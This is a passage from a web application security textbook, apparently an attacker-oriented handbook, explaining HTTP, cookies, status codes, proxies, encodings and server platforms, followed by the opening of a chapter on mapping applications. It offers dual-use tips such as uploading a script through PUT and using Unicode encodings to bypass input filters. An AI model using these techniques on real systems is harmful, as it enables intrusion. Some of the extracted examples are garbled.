message that it received. This can be used to detect the effect of any

proxy servers between the client and server that may manipulate the

Chapter 3 ■ Web Application Technologies 39

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 39

request. It can also sometimes be used as part of an attack against other

application users (see Chapter 12).

■■

OPTIONS — This method asks the server to report the HTTP methods

that are available for a particular resource. The server will typically

return a response containing an

Allow header that lists the available

methods.

■■

PUT — This method attempts to upload the specified resource to the

server, using the content contained in the body of the request. If this

method is enabled, then you may be able to leverage it to attack the

application; for example, by uploading an arbitrary script and execut-

ing this on the server.

Many other HTTP methods exist that are not directly relevant to attacking

web applications. However, a web server may expose itself to attack if certain

dangerous methods are available. See Chapter 17 for further details on these

and examples of using them in an attack.

URLs

A uniform resource locator (URL) is a unique identifier for a web resource, via

which that resource can be retrieved. The format of most URLs is as follows:

protocol://hostname[:port]/[path/]file[?param=value]

Several components in this scheme are optional, and the port number is nor-

mally only included if it diverges from the default used by the relevant proto-

col. The URL used to generate the HTTP request shown earlier is:

http://wahh-app.comm/books/search.asp?q=wahh

In addition to this absolute form, URLs may be specified relative to a partic-

ular host, or relative to a particular path on that host, for example:

/books/search.asp?q=wahh

search.asp?q=wahh

These relative forms are often used in web pages to describe navigation

within the web site or application itself.

NOTE The correct technical term for a URL is actually URI (or uniform

resource identifier), but this term is really only used in formal specifications

and by those who wish to exhibit their pedantry.

40 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 40

HTTP Headers

HTTP supports a large number of different headers, some of which are

designed for specific unusual purposes. Some headers can be used for both

requests and responses, while others are specific to one of these message types.

The headers you are likely to encounter when attacking web applications are

listed here.

General Headers

■■

Connection — This is used to inform the other end of the communica-

tion whether it should close the TCP connection after the HTTP trans-

mission has completed or keep it open for further messages.

■■

Content-Encoding — This is used to specify what kind of encoding is

being used for the content contained in the message body, such as

gzip,

which is used by some applications to compress responses for faster

transmission.

■■

Content-Length — This is used to specify the length of the message

body, in bytes (except in the case of responses to

HEAD requests, when it

indicates the length of the body in the response to the corresponding

GET request).

■■

Content-Type — This is used to specify the type of content contained in

the message body; for example,

text/html for HTML documents.

■■

Transfer-Encoding — This is used to specify any encoding that was

performed on the message body to facilitate its transfer over HTTP. It is

normally used to specify chunked encoding when this is employed.

Request Headers

■■

Accept — This is used to tell the server what kinds of content the client

is willing to accept, such as image types, office document formats, and

so on.

■■

Accept-Encoding — This is used to tell the server what kinds of content

encoding the client is willing to accept.

■■

Authorization — This is used to submit credentials to the server for one

of the built-in HTTP authentication types.

■■

Cookie — This is used to submit cookies to the server which were pre-

viously issued by it.

Chapter 3 ■ Web Application Technologies 41

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 41

■■

Host — This is used to specify the hostname that appeared in the full

URL being requested.

■■

If-Modified-Since — This is used to specify the time at which the

browser last received the requested resource. If the resource has not

changed since that time, the server may instruct the client to use its

cached copy, using a response with status code 304.

■■

If-None-Match — This is used to specify an entity tag, which is an iden-

tifier denoting the contents of the message body. The browser submits

the entity tag that the server issued with the requested resource when it

was last received. The server can use the entity tag to determine

whether the browser may use its cached copy of the resource.

■■

Referer — This is used to specify the URL from which the current

request originated.

■■

User-Agent — This is used to provide information about the browser or

other client software that generated the request.

Response Headers

■■

Cache-Control — This is used to pass caching directives to the browser

(for example,

no-cache).

■■

ETag — This is used to specify an entity tag. Clients can submit this

identifier in future requests for the same resource in the

If-None-Match

header to notify the server which version of the resource the browser

currently holds in its cache.

■■

Expires — This is used to instruct the browser how long the contents of

the message body are valid for. The browser may use the cached copy

of this resource until this time.

■■

Location — This is used in redirection responses (those with a status

code starting with 3) to specify the target of the redirect.

■■

Pragma — This is used to pass caching directives to the browser (for

example,

no-cache).

■■

Server — This is used to provide information about the web server soft-

ware being used.

■■

Set-Cookie — This is used to issue cookies to the browser that it will

submit back to the server in subsequent requests.

■■

WWW-Authenticate — This is used in responses with a 401 status code

to provide details of the type(s) of authentication supported by the

server.

42 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 42

Cookies are a key part of the HTTP protocol which most web applications rely

upon, and which can frequently be used as a vehicle for exploiting vulnerabil-

ities. The cookie mechanism enables the server to send items of data to the

client, which the client stores and resubmits back to the server. Unlike the

other types of request parameters (those within the URL query string or the

message body), cookies continue to be resubmitted in each subsequent request

without any particular action required by the application or the user.

A server issues a cookie using the

Set-Cookie response header, as already

observed:

Set-Cookie: tracking=tI8rk7joMx44S2Uu85nSWc

The user’s browser will then automatically add the following header to sub-

sequent requests back to the same server:

Cookie: tracking=tI8rk7joMx44S2Uu85nSWc

Cookies normally consist of a name/value pair, as shown, but may consist

of any string that does not contain a space. Multiple cookies can be issued by

using multiple

Set-Cookie headers in the server’s response, and are all sub-

mitted back to the server in the same

Cookie header, with a semicolon sepa-

rating different individual cookies.

In addition to the cookie’s actual value, the

Set-Cookie header can also

include any of the following optional attributes, which can be used to control

how the browser handles the cookie:

■■

expires — Used to set a date until which the cookie is valid. This will

cause the browser to save the cookie to persistent storage, and it will be

reused in subsequent browser sessions until the expiration date is

reached. If this attribute is not set, the cookie is used only in the current

browser session.

■■

domain — Used to specify the domain for which the cookie is valid.

This must be the same or a parent of the domain from which the cookie

is received.

■■

path — Used to specify the URL path for which the cookie is valid.

■■

secure – If this attribute is set, then the cookie will only ever be submit-

ted in HTTPS requests.

■■

HttpOnly — If this attribute is set, then the cookie cannot be directly

accessed via client-side JavaScript, although not all browsers support

this restriction.

Chapter 3 ■ Web Application Technologies 43

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 43

Each of these cookie attributes can impact the security of the application,

and the primary impact is on the ability of an attacker to directly target other

users of the application. See Chapter 12 for further details.

Status Codes

Each HTTP response message must contain a status code in its first line, indi-

cating the result of the request. The status codes fall into five groups, accord-

ing to the first digit of the code:

■■

1xx — Informational.

■■

2xx — The request was successful.

■■

3xx — The client is redirected to a different resource.

■■

4xx — The request contains an error of some kind.

■■

5xx — The server encountered an error fulfilling the request.

There are numerous specific status codes, many of which are used only in

specialized circumstances. The status codes you are most likely to encounter

when attacking a web application are listed here, together with the usual rea-

son phrase associated with them:

■■

100 Continue — This response is sent in some circumstances when a

client submits a request containing a body. The response indicates that

the request headers were received and that the client should continue

sending the body. The server will then return a second response when

the request has been completed.

■■

200 Ok — This indicates that the request was successful and the

response body contains the result of the request.

■■

201 Created — This is returned in response to a PUT request to indicate

that the request was successful.

■■

301 Moved Permanently — This redirects the browser permanently to a

different URL, which is specified in the

Location header. The client

should use the new URL in the future rather than the original.

■■

302 Found — This redirects the browser temporarily to a different URL,

which is specified in the

Location header. The client should revert to

the original URL in subsequent requests.

■■

304 Not Modified — This instructs the browser to use its cached copy

of the requested resource. The server uses the

If-Modified-Since and

If-None-Match request headers to determine whether the client has the

latest version of the resource.

44 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 44

■■

400 Bad Request — This indicates that the client submitted an invalid

HTTP request. You will probably encounter this when you have modi-

fied a request in certain invalid ways, for example by placing a space

character into the URL.

■■

401 Unauthorized — The server requires HTTP authentication before

the request will be granted. The

WWW-Authenticate header contains

details of the type(s) of authentication supported.

■■

403 Forbidden — This indicates that no one is allowed to access the

requested resource, regardless of authentication.

■■

404 Not Found — This indicates that the requested resource does not

exist.

■■

405 Method Not Allowed — This indicates that the method used in the

request is not supported for the specified URL. For example, you may

receive this status code if you attempt to use the

PUT method where it is

not supported.

■■

413 Request Entity Too Large — If you are probing for buffer overflow

vulnerabilities in native code, and so submitting long strings of data,

this indicates that the body of your request is too large for the server to

handle.

■■

414 Request URI Too Long — Similar to the previous response, this

indicates that the URL used in the request is too large for the server to

handle.

■■

500 Internal Server Error — This indicates that the server encountered

an error fulfilling the request. This normally occurs when you have sub-

mitted unexpected input that caused an unhandled error somewhere

within the application’s processing. You should review the full contents

of the server’s response closely for any details indicating the nature of

the error.

■■

503 Service Unavailable — This normally indicates that, although

the web server itself is functioning and able to respond to requests, the

application accessed via the server is not responding. You should verify

whether this is the result of any action that you have performed.

HTTPS

The HTTP protocol uses plain TCP as its transport mechanism, which is unen-

crypted and so can be intercepted by an attacker who is suitably positioned on

the network. HTTPS is essentially the same application-layer protocol as

Chapter 3 ■ Web Application Technologies 45

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 45

HTTP, but this is tunneled over the secure transport mechanism, Secure Sock-

ets Layer (SSL). This protects the privacy and integrity of all data passing over

the network, considerably reducing the possibilities for noninvasive intercep-

tion attacks. HTTP requests and responses function in exactly the same way

regardless of whether SSL is used for transport.

NOTE SSL has now strictly been superseded by transport layer security (TLS),

but the latter is still normally referred to using the older name.

HTTP Proxies

An HTTP proxy server is a server that mediates access between the client

browser and the destination web server. When a browser has been configured

to use a proxy server, it makes all of its requests to that server, and the proxy

relays the requests to the relevant web servers, and forwards their responses

back to the browser. Most proxies also provide additional services, including

caching, authentication, and access control.

There are two differences in the way HTTP works when a proxy server is

being used, which you should be aware of:

■■

When a browser issues an HTTP request to a proxy server, it places the

full URL into the request, including the protocol prefix

http:// and the

hostname of the server. The proxy server extracts the hostname and

uses this to direct the request to the correct destination web server.

■■

When HTTPS is being used, the browser cannot perform the SSL hand-

shake with the proxy server, as this would break the secure tunnel and

leave the communications vulnerable to interception attacks. Hence, the

browser must use the proxy as a pure TCP-level relay, which passes all

network data in both directions between the browser and the destina-

tion web server, with which the browser performs an SSL handshake as

normal. To establish this relay, the browser makes an HTTP request to

the proxy server using the

CONNECT method and specifying the destina-

tion hostname and port number as the URL. If the proxy allows the

request, it returns an HTTP response with a 200 status, keeps the TCP

connection open, and from that point onwards acts as a pure TCP-level

relay to the destination web server.

By some measure, the most useful item in your toolkit when attacking web

applications is a specialized kind of proxy server that sits between your

browser and the target web site and allows you to intercept and modify all

requests and responses, even those using HTTPS. We will begin examining

how you can use this kind of tool in the next chapter.

46 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 46

HTTP Authentication

The HTTP protocol includes its own mechanisms for authenticating users,

using various authentication schemes, including:

■■

Basic — This is a very simple authentication mechanism that sends

user credentials as a Base64-encoded string in a request header with

each message.

■■

NTLM — This is a challenge-response mechanism and uses a version of

the Windows NTLM protocol.

■■

Digest — This is a challenge-response mechanism and uses MD5

checksums of a nonce with the user’s credentials.

It is relatively rare to encounter these authentication protocols being used by

web applications deployed on the Internet, although they are more commonly

used within organizations to access intranet-based services.

COMMON MYTH “Basic authentication is insecure.”

Basic authentication places credentials in unencrypted form within the HTTP

request, and so it is frequently stated that the protocol is insecure and should

not be used. But forms-based authentication, as used by numerous banks, also

places credentials in unencrypted form within the HTTP request.

Any HTTP message can be protected from eavesdropping attacks by

using HTTPS as a transport mechanism, which should be done by every

security-conscious application. In relation to eavesdropping at least, basic

authentication is in itself no worse than the methods used by the majority of

today’s web applications.

Web Functionality

In addition to the core communications protocol used to send messages

between client and server, web applications employ numerous different tech-

nologies to deliver their functionality. Any reasonably functional application

may employ dozens of distinct technologies within its server and client com-

ponents. Before you can mount a serious attack against a web application, you

need a basic understanding of how its functionality is implemented, how the

technologies used are designed to behave, and where their weak points are

likely to lie.

Chapter 3 ■ Web Application Technologies 47

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 47

Server-Side Functionality

The early World Wide Web contained entirely static content. Web sites con-

sisted of various resources such as HTML pages and images, which were sim-

ply loaded onto a web server and delivered to any user who requested them.

Each time a particular resource was requested, the server responded with the

same content.

Today’s web applications still typically employ a fair number of static

resources. However, a large amount of the content that they present to users is

generated dynamically. When a user requests a dynamic resource, the server’s

response is created on the fly, and each user may receive content that is

uniquely customized for them.

Dynamic content is generated by scripts or other code executing on the

server. These scripts are akin to computer programs in their own right — they

have various inputs, perform processing on these, and return their outputs to

the user.

When a user’s browser makes a request for a dynamic resource, it does not

normally simply ask for a copy of that resource. In general, it will also submit

various parameters along with its request. It is these parameters that enable

the server-side application to generate content that is tailored to the individual

user. There are three main ways in which HTTP requests can be used to send

parameters to the application:

■■

In the URL query string.

■■

In HTTP cookies.

■■

In the body of requests using the POST method.

In addition to these primary sources of input, the server-side application

may in principle use any part of the HTTP request as an input to its processing.

For example, an application may process the

User-Agent header to generate

content that is optimized for the type of browser being used.

Like computer software in general, web applications employ a wide range

of technologies on the server side to deliver their functionality. These include:

■■

Scripting languages such as PHP, VBScript, and Perl.

■■

Web application platforms such as ASP.NET and Java.

■■

Web servers such as Apache, IIS, and Netscape Enterprise.

■■

Databases such as MS-SQL, Oracle, and MySQL.

■■

Other back-end components such as file systems, SOAP-based web ser-

vices, and directory services.

All of these technologies and the types of vulnerabilities that can arise in

relation to them will be examined in detail throughout this book. Some of the

48 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 48

most common web application platforms and languages you are likely to

encounter are described in the following sections.

The Java Platform

For several years, the Java Platform, Enterprise Edition (formerly known as

J2EE) has been a de facto standard for large-scale enterprise applications.

Developed by Sun Microsystems, it lends itself to multi-tiered and load-bal-

anced architectures, and is well suited to modular development and code

reuse. Because of its long history and widespread adoption, there are many

high-quality development tools, application servers, and frameworks avail-

able to assist developers. The Java Platform can be run on several underlying

operating systems, including Windows, Linux, and Solaris.

Descriptions of Java-based web applications often employ a number of

potentially confusing terms that you may need to be aware of:

■■

An Enterprise Java Bean (EJB) is a relatively heavyweight software

component that encapsulates the logic of a specific business function

within the application. EJBs are intended to take care of various techni-

cal challenges that application developers must address, such as trans-

actional integrity.

■■

A Plain Old Java Object (POJO) is an ordinary Java object, as distinct

from a special object like an EJB. POJO is normally used to denote

objects that are user-defined and much simpler and more lightweight

than EJBs and those used in other frameworks.

■■

A Java Servlet is an object that resides on an application server and

receives HTTP requests from clients and returns HTTP responses. There

are numerous useful interfaces that Servlet implementations can use to

facilitate the development of useful applications.

■■

A Java web container is a platform or engine that provides a runtime

environment for Java-based web applications. Examples of Java web

containers are Apache Tomcat, BEA WebLogic, and JBoss.

Many Java web applications employ third-party and open source compo-

nents alongside custom-built code. This is an attractive option because it

reduces development effort, and Java is well-suited to this modular approach.

Examples of components commonly used for key application functions are:

■■

Authentication — JAAS, ACEGI

■■

Presentation layer — SiteMesh, Tapestry

■■

Database object relational mapping — Hibernate

■■

Logging — Log4J

Chapter 3 ■ Web Application Technologies 49

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 49

If you can determine which open source packages are used in the applica-

tion you are attacking, you can download these and perform a code review or

install them to experiment on. A vulnerability in any of these may be

exploitable to compromise the wider application.

ASP.NET

ASP.NET is Microsoft’s web application framework and is a direct competitor

to the Java Platform. ASP.NET is several years younger than its counterpart

but has made some inroads into Java’s territory.

ASP.NET uses Microsoft’s .NET Framework, which provides a virtual

machine (the Common Language Runtime) and a set of powerful APIs. Hence,

ASP.NET applications can be written in any .NET language, such as C# or

VB.NET.

ASP.NET lends itself to the event-driven programming paradigm which is

normally used in conventional desktop software, rather than the script-based

approach used in most earlier web application frameworks. This, together

with the powerful development tools provided with Visual Studio, make

developing a functional web application extremely easy for anyone with min-

imal programming skills.

The ASP.NET framework helps to protect against some common web appli-

cation vulnerabilities such as cross-site scripting, without requiring any effort by

the developer. However, one practical downside of its apparent simplicity is that

many small-scale ASP.NET applications are actually created by beginners who

lack any awareness of the core security problems faced by web applications.

PHP

The PHP language emerged out of a hobby project (the acronym originally

stood for personal home page). It has since evolved almost unrecognizably

into a highly powerful and rich framework for developing web applications. It

is often used in conjunction with other free technologies in what is known as

the LAMP stack (comprising Linux, Apache, MySQL, and PHP).

Numerous open source applications and components have been developed

using PHP. Many of these provide off-the-shelf solutions for common applica-

tion functions, which are often incorporated into wider custom-built applica-

tions, for example:

■■

Bulletin boards — PHPBB, PHP-Nuke

■■

Administrative front ends — PHPMyAdmin

■■

Web mail — SquirrelMail, IlohaMail

■■

Photo galleries — Gallery

50 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 50

■■

Shopping carts — osCommerce, ECW-Shop

■■

Wikis — MediaWiki, WakkaWikki

Because PHP is free and easy to use, it has often been the language of choice

for many beginners writing web applications. Further, the design and default

configuration of the PHP framework has historically made it easy for pro-

grammers to unwittingly introduce security bugs into their code. These factors

have meant that applications written in PHP have suffered from a dispropor-

tionate number of security vulnerabilities. In addition to this, several defects

have existed within the PHP platform itself, which could often be exploited via

applications running on it. See Chapter 18 for details of common defects aris-

ing in PHP applications.

Client-Side Functionality

In order for the server-side application to receive user input and actions, and

present the results of these back to the user, it needs to provide a client-side

user interface. Because all web applications are accessed via a web browser,

these interfaces all share a common core of technologies. However, these have

been built upon in various diverse ways, and the ways in which applications

leverage client-side technology has continued to evolve rapidly in recent

years.

HTML

The core technology used to build web interfaces is the hypertext markup lan-

guage (HTML). This is a tag-based language that is used to describe the struc-

ture of documents that are rendered within the browser. From its simple

beginnings as a means of providing basic formatting to text documents,

HTML has developed into a rich and powerful language that can be used to

create highly complex and functional user interfaces.

Hyperlinks

A large amount of communication from client to server is driven by the user

clicking on hyperlinks. In web applications, hyperlinks frequently contain pre-

set request parameters. These are items of data which are never entered by the

user but which are submitted because the server placed them into the target

URL of the hyperlink on which the user clicks. For example, a web application

might present a series of links to news stories, each having the following form:

Chapter 3 ■ Web Application Technologies 51

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 51

When a user clicks on this link, the browser makes the following request:

GET /news/showStory?newsid=19371130&lang=en HTTP/1.1

Host: wahh-app.com

...

The server receives the two parameters in the query string (newsid and

lang) and uses their values to determine what content should be presented to

the user.

Forms

While hyperlink-based navigation is responsible for the majority of client-to-

server communications, in most web applications there is a need for more flex-

ible ways of gathering input and receiving actions from users. HTML forms

are the usual mechanism for allowing users to enter arbitrary input via their

browser. A typical form is as follows:

username: <input type=”text” name=”username”><br>

password: <input type=”password” name=”password”>

</form>

When the user enters values into the form and clicks the submit button, the

browser makes a request like the following:

POST /secure/login.php?app=quotations HTTP/1.1

Host: wahh-app.com

Content-Type: application/x-www-form-urlencoded

Content-Length: 39

Cookie: SESS=GTnrpx2ss2tSWSnhXJGyG0LJ47MXRsjcFM6Bd

username=daf&password=foo&redir=/secure/home.php&submit=log+in

In this request, there are several points of interest reflecting how different

aspects of the request are used to control server-side processing:

■■

Because the HTML form tag contained an attribute specifying the POST

method, the browser uses this method to submit the form, and places

the data from the form into the body of the request message.

■■

In addition to the two items of data entered by the user, the form con-

tains a hidden parameter (

redir) and a submit parameter (submit).

Both of these are submitted in the request and may be used by the

server-side application to control its logic.

52 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 52

■■

The target URL for the form submission contains a preset parameter

(

app), as in the hyperlink example shown previously. This parameter

may be used to control the server-side processing.

■■

The request contains a cookie parameter (SESS), which was issued to

the browser in an earlier response from the server. This parameter may

be used to control the server-side processing.

The previous request contains a header specifying that the type of content in

the message body is

x-www-form-urlencoded. This means that parameters are

represented in the message body as name/value pairs in the same way as they

are in the URL query string. The other content type you are likely to encounter

when form data is submitted is

multipart/form-data. An application can

request that browsers use multipart encoding by specifying this in an

enctype

attribute in the form tag. With this form of encoding, the Content-Type header

in the request will also specify a random string that is used as a separator for

the parameters contained in the request body. For example, if the form speci-

fied multipart encoding, the resulting request would look like the following:

POST /secure/login.php?app=quotations HTTP/1.1

Host: wahh-app.com

Content-Type: multipart/form-data; boundary=------------7d71385d0a1a

Content-Length: 369

Cookie: SESS=GTnrpx2ss2tSWSnhXJGyG0LJ47MXRsjcFM6Bd

------------7d71385d0a1a

Content-Disposition: form-data; name=”username”

daf

------------7d71385d0a1a

Content-Disposition: form-data; name=”password”

foo

------------7d71385d0a1a

Content-Disposition: form-data; name=”redir”

/secure/home.php

------------7d71385d0a1a

Content-Disposition: form-data; name=”submit”

------------7d71385d0a1a--

Chapter 3 ■ Web Application Technologies 53

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 53

JavaScript

Hyperlinks and forms can be used to create a rich user interface capable of eas-

ily gathering most kinds of input which web applications require. However,

most applications employ a more distributed model, in which the client side is

used not simply to submit user data and actions but also to perform actual pro-

cessing of data. This is done for two primary reasons:

■■

It can improve the application’s performance, because certain tasks can

be carried out entirely on the client component, without needing to

make a round trip of request and response to the server.

■■

It can enhance usability, because parts of the user interface can be

dynamically updated in response to user actions, without needing to

load an entirely new HTML page delivered by the server.

JavaScript is a relatively simple but powerful programming language that

can be easily used to extend web interfaces in ways that are not possible using

HTML alone. It is commonly used to perform the following tasks:

■■

Validating user-entered data before this is submitted to the server, to

avoid unnecessary requests if the data contains errors.

■■

Dynamically modifying the user interface in response to user actions;

for example, to implement drop-down menus and other controls famil-

iar from non-web interfaces.

■■

Querying and updating the document object model (DOM) within the

browser to control the browser’s behavior.

A significant development in the use of JavaScript has been the appearance

of AJAX techniques for creating a smoother user experience which is closer to

that provided by traditional desktop applications. AJAX (or Asynchronous

JavaScript and XML) involves issuing dynamic HTTP requests from within an

HTML page, to exchange data with the server and update the current web

page accordingly, without loading a new page altogether. These techniques

can provide very rich and satisfying user interfaces. They can also sometimes

be used by attackers to powerful effect, and may introduce vulnerabilities of

their own if not carefully implemented (see Chapter 12).

Thick Client Components

Going beyond the capabilities of JavaScript, some web applications employ

thicker client technologies that use custom binary code to extend the browser’s

built-in capabilities in arbitrary ways. These components may be deployed as

bytecode that is executed by a suitable browser plug-in, or may involve

54 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 54

installing native executables onto the client computer itself. The thick-client

technologies you are likely to encounter when attacking web applications are:

■■

Java applets

■■

ActiveX controls

■■

Shockwave Flash objects

These technologies are described in detail in Chapter 5.

State and Sessions

The technologies described so far enable the server and client components of a

web application to exchange and process data in numerous ways. To imple-

ment most kinds of useful functionality, however, applications need to track

the state of each user’s interaction with the application across multiple

requests. For example, a shopping application may allow users to browse a

product catalogue, add items to a cart, view and update the cart contents, pro-

ceed to checkout, and provide personal and payment details.

To make this kind of functionality possible, the application must maintain a

set of stateful data generated by the user’s actions across several requests. This

data is normally held within a server-side structure called a session. When a

user performs an action, such as adding an item to her shopping cart, the

server-side application updates the relevant details within the user’s session.

When the user later views the contents of her cart, data from the session is

used to return the correct information to the user.

In some applications, state information is stored on the client component

rather than the server. The current set of data is passed to the client in each

server response, and is sent back to the server in each client request. Of course,

because any data transmitted via the client component may be modified by the

user, applications need to take measures to protect themselves from attackers

who may change this state information in an attempt to interfere with the

application’s logic. The ASP.NET platform makes use of a hidden form field

called the ViewState to store state information about the user’s web interface

and so reduce overhead on the server. By default, the contents of the ViewState

include a keyed hash to prevent tampering.

Because the HTTP protocol is itself stateless, most applications need a

means of re-identifying individual users across multiple requests, in order for

the correct set of state data to be used to process each request. This is normally

achieved by issuing each user a token which uniquely identifies that user’s

session. These tokens may be transmitted using any type of request parameter,

but HTTP cookies are used by most applications. Several kinds of vulnerabil-

ity arise in relation to session handling, and these are described in detail in

Chapter 7.

Chapter 3 ■ Web Application Technologies 55

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 55

Encoding Schemes

Web applications employ several different encoding schemes for their data.

Both the HTTP protocol and the HTML language are historically text-based,

and different encoding schemes have been devised to ensure that unusual

characters and binary data can be safely handled by these mechanisms. When

you are attacking a web application, you will frequently need to encode data

using a relevant scheme to ensure that it is handled in the way you intend. Fur-

ther, in many cases you may be able to manipulate the encoding schemes used

by an application to cause behavior that its designers did not intend.

URL Encoding

URLs are permitted to contain only the printable characters in the US-ASCII

character set — that is, those whose ASCII code is in the range 0x20–0x7e

inclusive. Further, several characters within this range are restricted because

they have special meaning within the URL scheme itself or within the HTTP

protocol.

The URL encoding scheme is used to encode any problematic characters

within the extended ASCII character set so that they can be safely transported

over HTTP. The URL-encoded form of any character is the

% prefix followed by

the character’s two-digit ASCII code expressed in hexadecimal. Some exam-

ples of characters that are commonly URL-encoded are shown here:

%3d =

%25 %

%20 space

%0a new line

%00 null byte

A further encoding to be aware of is the + character, which represents a URL-

encoded space (in addition to the

%20 representation of a space).

NOTE For the purpose of attacking web applications, you should URL-encode

any of the following characters when you are inserting them as data into an

HTTP request:

space % ? & = ; + #

(Of course, you will often need to use these characters with their special

meaning when modifying a request — for example, to add an additional request

parameter to the query string. In this case, they should be used in their literal

form.)

56 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 56

Unicode Encoding

Unicode is a character encoding standard that is designed to support all of the

writing systems used in the world. It employs various encoding schemes, some

of which can be used to represent unusual characters in web applications.

16-bit Unicode encoding works in a similar way to URL-encoding. For

transmission over HTTP, the 16-bit Unicode-encoded form of a character is the

%u prefix followed by the character’s Unicode code point expressed in hexa-

decimal. For example:

%u2215 /

%u00e9 é

UTF-8 is a variable-length encoding standard that employs one or more

bytes to express each character. For transmission over HTTP, the UTF-8

encoded form of a multi-byte character simply uses each byte expressed in

hexadecimal and preceded by the

% prefix. For example:

%c2%a9 ©

%e2%89%a0 ≠

For the purpose of attacking web applications, Unicode encoding is primar-

ily of interest because it can sometimes be used to defeat input validation

mechanisms. If an input filter blocks certain malicious expressions, but the

component that subsequently processes the input understands Unicode

encoding, then it may be possible to bypass the filter using various standard

and malformed Unicode encodings.

HTML Encoding

HTML encoding is a scheme used to represent problematic characters so that

they can be safely incorporated into an HTML document. Various characters

have special meaning as meta-characters within HTML and are used to define

the structure of a document rather than its content. To use these characters

safely as part of the document’s content, it is necessary to HTML-encode them.

HTML encoding defines numerous HTML entities to represent specific lit-

eral characters, for example:

" “

' ‘

& &

< <

> >

Chapter 3 ■ Web Application Technologies 57

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 57

In addition, any character can be HTML-encoded using its ASCII code in

decimal form, for example:

" “

' ‘

or by using its ASCII code in hexadecimal form (prefixed by an x), for example:

" “

' ‘

When you are attacking a web application, your main interest in HTML

encoding is likely to be when probing for cross-site scripting vulnerabilities. If

an application returns user input unmodified within its responses, then it is

probably vulnerable, whereas if dangerous characters are HTML-encoded

then it is probably safe. See Chapter 12 for more details of these vulnerabilities.

Base64 Encoding

Base64 encoding allows any binary data to be safely represented using only

printable ASCII characters. It is commonly used for encoding email attach-

ments for safe transmission over SMTP, and is also used to encode user cre-

dentials in basic HTTP authentication.

Base64 encoding processes input data in blocks of three bytes. Each of these

blocks is divided into four chunks of six bits each. Six bits of data allow for 64

different possible permutations, and so each chunk can be represented using a

set of 64 characters. Base64 encoding employs the following character set,

which contains only printable ASCII characters:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

If the final block of input data results in less than three chunks of output

data, then the output is padded with one or two

= characters.

For example, the Base64-encoded form of The Web Application Hacker’s Hand-

book is:

VGhlIFdlYiBBcHBsaWNhdGlvbiBIYWNrZXIncyBIYW5kYm9vaw==

Many web applications make use of Base64 encoding for transmitting

binary data within cookies and other parameters, and even for obfuscating

sensitive data to prevent trivial modification. You should always look out for,

and decode, any Base64 data that is issued to the client. Base64-encoded

strings can often be easily recognized from their specific character set and the

presence of padding characters at the end of the string.

58 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 58

Hex Encoding

Many applications use straightforward hexadecimal encoding when transmit-

ting binary data, using ASCII characters to represent the hexadecimal block.

For example, hex-encoding the username “daf” within a cookie would result in:

646166

As with Base64, hex-encoded data is usually easy to spot, and you should

always attempt to decode any such data that the server sends to the client, to

understand its function.

Next Steps

So far, we have described the current state of web application (in)security,

examined the core mechanisms by which web applications can defend them-

selves, and taken a brief look at the key technologies employed in today’s

applications. With this groundwork in place, we are now in a position to start

looking at the actual practicalities of attacking web applications.

In any attack, your first task is to map the target application’s content and

functionality, to establish how it functions, how it attempts to defend itself,

and what technologies it uses. The next chapter examines this mapping

process in detail and shows how you can use it to obtain a deep understand-

ing of an application’s attack surface that will prove vital when it comes to

finding and exploiting security flaws within your target.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. What is the

OPTIONS method used for?

2. What are the

If-Modified-Since and If-None-Match headers used for?

Why might you be interested in these when attacking an application?

3. What is the significance of the

secure flag when a server sets a cookie?

4. What is the difference between the common status codes 301 and 302?

5. How does a browser interoperate with a web proxy when SSL is being

used?

Chapter 3 ■ Web Application Technologies 59

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 59

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 60

The first step in the process of attacking an application is to gather and exam-

ine some key information about it, in order to gain a better understanding of

what you are up against.

The mapping exercise begins by enumerating the application’s content and

functionality, in order to understand what the application actually does and

how it behaves. Much of this functionality will be easy to identify, but some of

it may be hidden away, and require a degree of guesswork and luck in order to

discover.

Having assembled a catalogue of the application’s functionality, the princi-

pal task is to closely examine every aspect of its behavior, its core security

mechanisms, and the technologies being employed (on both client and server).

This will enable you to identify the key attack surface that the application

exposes and hence the most interesting areas on which to target subsequent

probing to find exploitable vulnerabilities.

In this chapter, we will describe the practical steps you need to follow dur-

ing application mapping, various techniques and tricks you can use to maxi-

mize its effectiveness, and some tools that can assist you in the process.

Mapping the Application

CHAPTER

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 61

Enumerating Content and Functionality

In a typical application, the majority of the content and functionality can be

identified via manual browsing. The basic approach is to walk through the

application starting from the main initial page, following every link and navi-

gating through all multistage functions (such as user registration or password

resetting). If the application contains a “site map,” this can provide a useful

starting point for enumerating content.

However, to perform a rigorous inspection of the enumerated content, and

to obtain a comprehensive record of everything identified, it is necessary to

employ some more advanced techniques than simple browsing.

Web Spidering

Various tools exist which perform automated spidering of web sites. These

tools work by requesting a web page, parsing it for links to other content,

and then requesting these, continuing recursively until no new content is

discovered.

Building on this basic function, web application spiders attempt to achieve

